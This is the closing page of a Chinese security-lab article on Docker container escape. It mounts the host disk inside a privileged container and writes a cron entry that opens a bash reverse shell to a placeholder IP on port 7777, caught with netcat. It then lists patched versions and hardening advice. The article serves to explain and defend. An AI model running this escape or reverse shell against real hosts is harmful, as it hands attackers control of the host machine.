侵權(quán)投訴
訂閱
糾錯
加入自媒體

美創(chuàng)安全實驗室 | Docker逃逸原理


同理,新建一個目錄/test2,將/dev/sda3掛載到新建的目錄下,并查看test2目錄下的內(nèi)容,發(fā)現(xiàn)可以訪問宿主機上/目錄下的內(nèi)容了

image.png


在計劃任務里寫入一個反彈shell:

echo '* * * * * bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'>> /test2/var/spool/cron/root

image.png


在Docker上開啟netcat監(jiān)聽7777端口,成功接收到宿主主機的Shell,實現(xiàn)Docker逃逸。

image.png


Docker逃逸防御

更新Docker版本到19.03.1及更高版本——CVE-2019-14271、覆蓋CVE-2019-5736。

runc版本 >1.0-rc6

k8s 集群版本>1.12

Linux內(nèi)核版本>=2.6.22——CVE-2016-5195(臟牛)

Linux內(nèi)核版本>=4.14——CVE-2017–1000405(大臟牛),未找到docker逃逸利用過程,但存在逃逸風險。

不建議以root權(quán)限運行Docker服務。

不建議以privileged(特權(quán)模式)啟動Docker。

不建議將宿主機目錄掛載至容器目錄。

不建議將容器以—cap-add=SYSADMIN啟動,SYSADMIN意為container進程允許執(zhí)行mount、umount等一系列系統(tǒng)管理操作,存在容器逃逸風險。

美創(chuàng)科技聚焦數(shù)據(jù)安全,圍繞數(shù)據(jù)安全、災難備份、數(shù)據(jù)管理、智能運維等多方面挖掘和鑄造數(shù)據(jù)價值,憑借卓越的產(chǎn)品技術和服務贏得了眾多行業(yè)的認可和用戶口碑!

<上一頁  1  2  3  
聲明: 本文由入駐維科號的作者撰寫,觀點僅代表作者本人,不代表OFweek立場。如有侵權(quán)或其他問題,請聯(lián)系舉報。

發(fā)表評論

0條評論,0人參與

請輸入評論內(nèi)容...

請輸入評論/評論長度6~500個字

您提交的評論過于頻繁,請輸入驗證碼繼續(xù)

暫無評論

暫無評論

    安防 獵頭職位 更多
    文章糾錯
    x
    *文字標題:
    *糾錯內(nèi)容:
    聯(lián)系郵箱:
    *驗 證 碼:

    粵公網(wǎng)安備 44030502002758號